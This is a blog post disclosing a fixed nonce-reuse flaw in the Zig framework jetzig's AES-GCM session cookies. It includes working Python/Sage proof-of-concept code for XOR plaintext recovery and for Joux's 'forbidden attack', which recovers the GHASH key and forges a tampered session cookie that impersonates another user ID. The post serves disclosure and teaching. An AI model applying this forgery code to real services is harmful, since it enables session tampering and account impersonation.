Nonce reuse: not even once - Superficial Reflections

In this blog post, I will demonstrate how a mistake in jetzig’s session implementation could be used to break confidentiality and integrity of session data. A fix has been applied, so it is no longer possible to exploit the attack shown in the following. All code samples in this post will be Python, due to Python’s excellent math support through Sage. This post is also available as a Sage notebook if you want to follow allong interactively.

tl;dr: A nonce must never be used twice.

About jetzig’s sessions

Jetzig is a web framework for Zig. For convenience, it comes with a session implementation that is based on encrypted cookies: the server side encrypts all data with a key unknown to the client and stores the encrypted data in a cookie. When the client sends the cookie data back to the server, the server knows the decrypted data originated from the server at some point.

The implementation of the encrypted cookie is (conceptually) as follows:

import json
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# In jetzig's implementation, this is read from the `JETZIG_SECRET` environment variable
# It's only hardcoded here for demonstration purposes
SECRET = bytes(range(0, 44))

def encrypt(data):
    key = SECRET[:256 // 8]
    nonce = SECRET[len(key):]
    json_data = json.dumps(data).encode("utf-8")
    return AESGCM(key).encrypt(nonce, json_data, None)

The result of encrypt would then be set as cookie data.

If you have a working knowledge of cryptography, you might already have spotted the issue here. If not, I’ll explain it later on.

Let’s try it with some values:

session_1234 = encrypt({"user_id": "1234"})
session_9876 = encrypt({"user_id": "9876"})

print(session_1234)
print(session_9876)

b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc6\xca\xe4k\x91B\xec\xf5D\xa5`\x88\xca\xcc\xd8\t\x8f\x01,\t&'
b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3!\xcc\xce\xe6k\x91\x882f\x03a\x0e\xbe\x15Uk.\xb3\x06\x1e\x80&'

Interesting. The values start the same. Let’s XOR them. Same bytes will then be \x00 afterwards. Let’s start with a little helper, because XOR will be used quite a lot:

def xor(a, b):
    # In Sage, ^^ is used for XOR instead of ^ like in regular Python
    return bytes(byte_a ^^ byte_b for byte_a, byte_b in zip(a, b))

Now let’s XOR the two session values:

xor(session_1234, session_9876)

b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\n\x04\x02\x00\x00\xca\xde\x93G\xc4n6\xdf\x99\xb3'<\x072\x89\x00"

So the values start the same, then some differences, short same again, then different again. What happens if we XOR 1234 and 9876, our two user IDs?

xor(b"1234", b"9876")

b'\x08\n\x04\x02'

Oh look. It’s exactly one of the differences between the two session cookie values. In fact, if you know the plain value of one session cookie, you can use it to decrypt the other session cookie:

# Let's assume we know the plain value for the 1234 session, so we XOR it against the encrypted value
cipher_xor = xor(session_1234, b'{"user_id": "1234"}')
# And then use the resulting XOR against the 9876 session
plain_9876 = xor(session_9876, cipher_xor)
# And we get back the plain value for the other session
plain_9876

b'{"user_id": "9876"}'

Not super great. Also not super bad. First, you probably don’t know the plain session content (though you can guess, at least parts of it, e.g. JSON delimiters). Second, once you know the cookie value for some other user, you can use it to access the application on behalf of that user (this is known as session hijacking). No XOR tricks necessary at all. Luckily for other users, you don’t know their cookie values, only your own.

Modifying session values

So you don’t know other’s cookie value, but you know your own. And you know where exactly the user ID is stored in the session, for example because you signed up twice and got two different cookie values and XORed them. Couldn’t you use this to modify the session and put in a different ID? To test this, let me add the function to decrypt session cookie values again:

def decrypt(data):
    key = SECRET[:256 // 8]
    nonce = SECRET[len(key):]
    json_data = AESGCM(key).decrypt(nonce, data, None)
    return json.loads(json_data)

Does it work?

decrypt(session_1234)

{'user_id': '1234'}

Looks good. Next, let’s construct a new session cookie value. From earlier, you know that XORing the encrypted value with the plain value and then using the result to XOR another encrypted value gives you the other plain value. So, using the XOR result with some plain value should give you an encrypted value:

# User ID's start index
start_idx = len(b'{"user_id": "')
cipher_xor = xor(session_1234[start_idx:start_idx + len(b"1234")], b"1234")
new_value = (
    session_1234[:start_idx] + xor(b"1337", cipher_xor) + session_1234[start_idx + len(b"1234"):]
)
new_value

b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc7\xca\xe7k\x91B\xec\xf5D\xa5`\x88\xca\xcc\xd8\t\x8f\x01,\t&'

Doesn’t look too bad. Now let’s try to use it:

try:
    decrypt(new_value)
except Exception as e:
    print("No success :(")
    print(f"Exception is {e!r}")

No success :(
Exception is InvalidTag()

Oh snap. Why does it throw an InvalidTag exception? It is because jetzig uses AES-GCM to encrypt session cookies. AES-GCM is an authenticated encryption, which means it’s designed to prevent exactly what we tried to achieve: it detects that an encrypted value was modified. To achieve this, an additional tag is appended to the encrypted value. The tag is a hash of (among other things) the encrypted value. This is the second difference we saw when we XORed session_1234 with session_9876 above.

Unfortunately, when nonces are re-used in AES-GCM (and that is exactly what jetzig did and perhaps you already spotted it right at the beginning), it’s possible to recover the authentication key used to calculate the authentication tag. This is possible with The forbidden attack, described by Antoine Joux in Authentication Failures in NIST version of GCM. A more verbose description how the attack works can be found in Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS by Hanno Böck and Aaron Zauner and Sean Devlin and Juraj Somorovsky and Philipp Jovanovic.

Roughly sketched out, the attack works because AES-GCM uses a hash function called GHASH for the authenticaton tag. GHASH is defined as a computation over the Galois field GF(2¹²⁸) and this field is defined by the polynomial x¹²⁸ + x⁷ + x² + x + 1. Due to the double use of the nonce, finding the authentication key can be expressed as finding the roots of this polynomial. Again, see Böck et al’s paper for more details.

The following code uses the idea from above (modify the encrypted value), but additionally also calculates the correct authentication tag for the modified value:

# The following code was initially taken from https://github.com/jvdsn/crypto-attacks/blob/master/attacks/gcm/forbidden_attack.py
# Copyright (c) 2020 Joachim Vandersmissen and released under the MIT license

from sage.all import GF

x = GF(2)["x"].gen()
gf2e = GF(2 ** 128, name="y", modulus=x ** 128 + x ** 7 + x ** 2 + x + 1)


def _to_gf2e(n):
    """
    Converts an integer to a gf2e element, little endian.
    """
    return gf2e([(n >> i) & 1 for i in range(127, -1, -1)])


def _from_gf2e(p):
    """
    Converts a gf2e element to an integer, little endian.
    """
    n = p.to_integer()
    ans = 0
    for i in range(128):
        ans <<= 1
        ans |= ((n >> i) & 1)

    return ans


def _ghash(h, a, c):
    """
    Calculates the GHASH polynomial.
    """
    la = len(a)
    lc = len(c)
    p = gf2e(0)
    for i in range(la // 16):
        p += _to_gf2e(int.from_bytes(a[16 * i:16 * (i + 1)], byteorder="big"))
        p *= h

    if la % 16 != 0:
        p += _to_gf2e(int.from_bytes(a[-(la % 16):] + bytes(16 - la % 16), byteorder="big"))
        p *= h

    for i in range(lc // 16):
        p += _to_gf2e(int.from_bytes(c[16 * i:16 * (i + 1)], byteorder="big"))
        p *= h

    if lc % 16 != 0:
        p += _to_gf2e(int.from_bytes(c[-(lc % 16):] + bytes(16 - lc % 16), byteorder="big"))
        p *= h

    p += _to_gf2e(((8 * la) << 64) | (8 * lc))
    p *= h
    return p


def recover_possible_auth_keys(a1, c1, t1, a2, c2, t2):
    """
    Recovers possible authentication keys from two messages encrypted with the same authentication key.
    More information: Joux A., "Authentication Failures in NIST version of GCM"
    :param a1: the associated data of the first message (bytes)
    :param c1: the ciphertext of the first message (bytes)
    :param t1: the authentication tag of the first message (bytes)
    :param a2: the associated data of the second message (bytes)
    :param c2: the ciphertext of the second message (bytes)
    :param t2: the authentication tag of the second message (bytes)
    :return: a generator generating possible authentication keys (gf2e element)
    """
    h = gf2e["h"].gen()
    p1 = _ghash(h, a1, c1) + _to_gf2e(int.from_bytes(t1, byteorder="big"))
    p2 = _ghash(h, a2, c2) + _to_gf2e(int.from_bytes(t2, byteorder="big"))
    for h, _ in (p1 + p2).roots():
        yield h

def forge_tag(h, a, c, t, target_a, target_c):
    """
    Forges an authentication tag for a target message given a message with a known tag.
    This method is best used with the authentication keys generated by the recover_possible_auth_keys method.
    More information: Joux A., "Authentication Failures in NIST version of GCM"
    :param h: the authentication key to use (gf2e element)
    :param a: the associated data of the message with the known tag (bytes)
    :param c: the ciphertext of the message with the known tag (bytes)
    :param t: the known authentication tag (bytes)
    :param target_a: the target associated data (bytes)
    :param target_c: the target ciphertext (bytes)
    :return: the forged authentication tag (bytes)
    """
    ghash = _from_gf2e(_ghash(h, a, c))
    target_ghash = _from_gf2e(_ghash(h, target_a, target_c))
    return (
        ghash ^^ int.from_bytes(t, byteorder="big") ^^ target_ghash
    ).to_bytes(16, byteorder="big")

# The last 16 bytes are the authentication tag
cipher_1234 = session_1234[:-16]
tag_1234 = session_1234[-16:]
cipher_9876 = session_9876[:-16]
tag_9876 = session_9876[-16:]

# Construct a new encrypted value by replacing the encrypted user ID with a different encrypted ID
# This is possible because the plain value for the user ID is known (it's typically displayed
# somewhere in an application)
user_id_xor = xor(cipher_1234[-len(b"1234") - 2:-2], b"1234")
attack_cipher = cipher_1234[:-len(b"1234") - 2] + xor(user_id_xor, b"1337") + cipher_1234[-2:]

# Recover the auth key and calculate a tag for our encrypted value
possible_key = next(
    recover_possible_auth_keys(b"", cipher_1234, tag_1234, b"", cipher_9876, tag_9876)
)
tag = forge_tag(possible_key, b"", cipher_1234, tag_1234, b"", attack_cipher)
attack_value = attack_cipher + tag
attack_value

b'\xa9\x18\xd3\x03\t\xeaEg~^x\xee\xe3)\xc7\xca\xe7k\x91e\x1am\x97\x82S8\xaa<Jr\x9d\xbd\x82\xf7\xc8'

Let’s see whether I got lucky:

decrypt(attack_value)

{'user_id': '1337'}

Great success.